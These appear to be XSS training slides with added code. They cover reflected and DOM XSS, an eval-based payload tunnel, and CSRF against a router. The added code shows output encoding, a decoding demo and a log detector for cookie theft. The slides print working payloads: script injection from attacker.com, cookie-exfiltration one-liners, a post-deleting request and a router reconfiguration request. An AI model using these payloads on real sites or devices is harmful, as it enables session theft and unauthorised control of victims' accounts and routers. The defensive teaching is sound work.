██╗ ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
╚███╔╝ ███████╗███████╗
██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝ ╚═╝╚══════╝╚══════╝
XSS vulnerabilities
echo $_GET['param'];
XSS
XSS inside a <title> tag: a <script> inside <title> is inert, so the payload must first close the tag (</title>) and then inject
Visit http://site.com/?param=<script src='http://attacker.com/1.js'></script>
innerHTML / v-html (DOM sinks)
document.body.innerHTML="<script>alert(1)</script>" // does not execute: browsers do not run <script> elements inserted through innerHTML
document.body.innerHTML="<img src='x' onerror='alert(1)'>" // executes: the onerror handler fires as soon as the broken image fails to load
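Added example (mine, not code from the slides): the output-encoding fix for the reflected `echo $_GET['param'];` above, written in JavaScript so the two payloads on the slide can be checked offline. `escapeHtml`, `renderUnsafe`, `renderSafe` and `containsRawTag` are names I chose; the second payload is a constructed `</title>` breakout.

```javascript
// Added example, not from the original slides. Encodes the five characters
// that change meaning in an HTML text node or a quoted attribute value.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Same behaviour as the PHP one-liner on the slide: raw reflection into
// both a <title> (RCDATA) context and an ordinary text-node context.
function renderUnsafe(param) {
  return `<title>Search: ${param}</title><p>${param}</p>`;
}

// Hardened reflection: every interpolation of untrusted data is encoded.
function renderSafe(param) {
  const enc = escapeHtml(param);
  return `<title>Search: ${enc}</title><p>${enc}</p>`;
}

// Crude check used only to compare the two renderers: does the page still
// contain an opening or closing tag with this name coming from the input?
function containsRawTag(html, tagName) {
  return new RegExp(`<\\/?${tagName}\\b`, 'i').test(html);
}

// Constructed payloads: the script-src one from the slide, and a title
// breakout showing why "title tag XSS" works even though <script> inside
// <title> is inert. Encoding turns '<' and '>' into entities, so the
// closing </title> never reaches the parser as a tag.
const PAYLOADS = [
  "<script src='http://attacker.com/1.js'></script>",
  "</title><script>alert(1)</script>",
];

for (const p of PAYLOADS) {
  console.log('unsafe:', renderUnsafe(p));
  console.log('safe:  ', renderSafe(p));
}
```

Encoding is context-specific: this table is right for HTML body and quoted attribute values, not for URLs, `javascript:` targets or event-handler attributes. For the DOM sinks on the slide the equivalent fix is to write untrusted text with `textContent` instead of `innerHTML` or `v-html`.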
eval == evil
tunnel.html
<body><script>eval(unescape(atob(location.search.slice(1))))</script></body>
...
// attacker side: build the URL to send the victim to
'/tunnel.html?'+btoa(escape(jscode))
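Added example (my code, not the slide author's): the encode/decode pair behind tunnel.html, with the edge case that explains why `escape()`/`unescape()` appear in the payload at all. Function names and the sample payload are mine; it assumes Node 16+ where `atob`/`btoa` are globals, and `escape`/`unescape` are the legacy Annex B functions every engine still ships.

```javascript
// Added example, not from the original slides.

// Attacker side. escape() rewrites every non-ASCII code unit as %uXXXX so
// that btoa(), which only accepts Latin-1, does not throw on e.g. a Chinese
// string literal inside the JavaScript being tunnelled.
function encodeTunnel(jscode) {
  return '/tunnel.html?' + btoa(escape(jscode));
}

// What tunnel.html does before eval(): location.search.slice(1) drops the
// leading '?', atob() undoes base64, unescape() restores the original text.
function decodeTunnel(search) {
  return unescape(atob(search.slice(1)));
}

// The same thing without escape(): shows why the tunnel needs it.
function naiveEncodeThrows(jscode) {
  try {
    btoa(jscode);
    return false;
  } catch (e) {
    return true; // InvalidCharacterError on any code unit above 0xFF
  }
}

// Constructed payload: ASCII plus characters outside Latin-1.
const PAYLOAD = "alert('hi from tunnel: 你好')";
const URL_PATH = encodeTunnel(PAYLOAD);
// What location.search would hold once the page loads.
const SEARCH = URL_PATH.slice(URL_PATH.indexOf('?'));

console.log(URL_PATH);
console.log(decodeTunnel(SEARCH));
```

Two things a practitioner should take from this. Detection side: a WAF or log search that only looks for `<script` or `alert(` in the URL sees base64 here, so decoding before matching is required. Defence side: tunnel.html is itself a DOM XSS sink (`eval` of `location.search`) on whatever host serves it, so anyone who finds it can run code in that origin, not just the person who uploaded it.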
Exploiting XSS - Stealing
new Image().src="https://attacker.com/?cookie="+escape(document.cookie)
var script = document.createElement('script');script.src="https://attacker.com/?cookie="+escape(document.cookie);document.body.append(script)
fetch('https://attacker.com/?cookie='+document.cookie)
# tail -f mb_accesslog
45.33.104.18 - - [09/Mar/2020:22:12:29 +0800] "GET /?cookie=BIDUPSID=4B3A1F21C50AA81B...omitted...BD_HOME=1 HTTP/1.1" 301 5 "https://www.baidu.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36"
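Added example (my code, not from the slides): detection logic for the three exfil one-liners above, run over access-log lines in the combined format the `tail -f` output uses. The sample lines are constructed (documentation-range IPs, made-up cookie names); the parameter-name list and the scoring thresholds are my assumptions and should be tuned to the site.

```javascript
// Added example, not from the original slides.

// Apache/Nginx "combined" format: ip ident user [time] "req" status bytes "referer" "ua"
const COMBINED_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseCombined(line) {
  const m = COMBINED_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, referer, ua] = m;
  const q = target.indexOf('?');
  return {
    ip, time, method, status: Number(status), referer, ua,
    path: q === -1 ? target : target.slice(0, q),
    query: q === -1 ? '' : target.slice(q + 1),
  };
}

// "a=1&b=2" -> [['a','1'],['b','2']], values left raw for now.
function parseQuery(query) {
  if (!query) return [];
  return query.split('&').map((kv) => {
    const i = kv.indexOf('=');
    return i === -1 ? [kv, ''] : [kv.slice(0, i), kv.slice(i + 1)];
  });
}

// escape() and encodeURIComponent() turn '=' into %3D and ';' into %3B while
// fetch() sends them raw, so decode before looking at the shape. %uXXXX from
// escape() makes decodeURIComponent throw; fall back to the raw value.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// document.cookie reads "NAME=value; NAME2=value2": count chunks of that shape.
function countCookiePairs(value) {
  const chunks = safeDecode(value).split(/;\s*/).filter(Boolean);
  return chunks.filter((c) => /^[\w.\-]+=.+$/.test(c)).length;
}

// Parameter names the exfil snippets above would use (assumed list).
const SUSPECT_PARAMS = /^(c|ck|cookie|cookies|data|d)$/i;

// Score the most suspicious parameter of one request; >= 3 is reported.
function scoreRequest(req) {
  let best = { score: 0, param: null, pairs: 0 };
  for (const [name, raw] of parseQuery(req.query)) {
    let s = 0;
    if (SUSPECT_PARAMS.test(name)) s += 2;
    const pairs = countCookiePairs(raw);
    s += pairs >= 2 ? 2 : pairs === 1 ? 1 : 0;
    if (s > best.score) best = { score: s, param: name, pairs };
  }
  return best;
}

function detectCookieExfil(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseCombined(line);
    if (!req) continue;
    const best = scoreRequest(req);
    if (best.score >= 3) findings.push({ ip: req.ip, path: req.path, referer: req.referer, ...best });
  }
  return findings;
}

// Constructed sample log: a fetch()-style raw exfil, an escape()-encoded one,
// and two benign requests (one with a harmless '=' inside a value).
const SAMPLE_LOG = [
  '203.0.113.7 - - [09/Mar/2020:22:12:29 +0800] "GET /?cookie=BIDUPSID=4B3A1F21C50AA81B;%20BD_HOME=1 HTTP/1.1" 301 5 "https://www.example.com/" "Mozilla/5.0"',
  '198.51.100.2 - - [09/Mar/2020:22:13:02 +0800] "GET /?c=sid%3Dabc123%3B%20theme%3Ddark HTTP/1.1" 200 0 "https://www.example.com/profile" "Mozilla/5.0"',
  '198.51.100.9 - - [09/Mar/2020:22:13:40 +0800] "GET /search?q=a=b HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [09/Mar/2020:22:14:01 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
];

for (const f of detectCookieExfil(SAMPLE_LOG)) {
  console.log(`${f.ip} ${f.path} param=${f.param} pairs=${f.pairs} score=${f.score} referer=${f.referer}`);
}
```

This is written from the attacker-host side of the log (the slide's `tail -f` is on attacker.com), which is the cheap place to confirm a payload worked. On the victim site the same shape appears in the Referer of outbound fetches only if you have client-side telemetry or a CSP `report-uri`, which is the more useful place to catch it; the parsing is the same.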
document.cookie [mitigation: set the cookie HttpOnly so script cannot read it]
document.body.innerText
IP address, geolocation, User-Agent info
Keylogger Script
Borrowed knife (CSRF through the victim's browser)
Lure the victim into clicking via social engineering; success depends on the victim's environment (an active logged-in session, a reachable LAN device)
new Image().src="http://www.victim-sns.com/del_post?id=33456" // deletes a post [mitigation: require a hash/token check on the request]
<img src="http://192.168.1.1/userPpm/ManageControlRpm.html?port=80&ip=255.255.255.255&Save=%B1%A3+%B4%E6"> // FAST wireless router web admin; default username and password: admin
Weibo XSS Worm
Phishing
Clickbait lure headline, e.g. "Guangdong locals eat (baby) soup for virility [shocking news]"
Red-envelope (cash gift) giveaway
Impersonation
clickjacking
SINCE 2018 © markbuild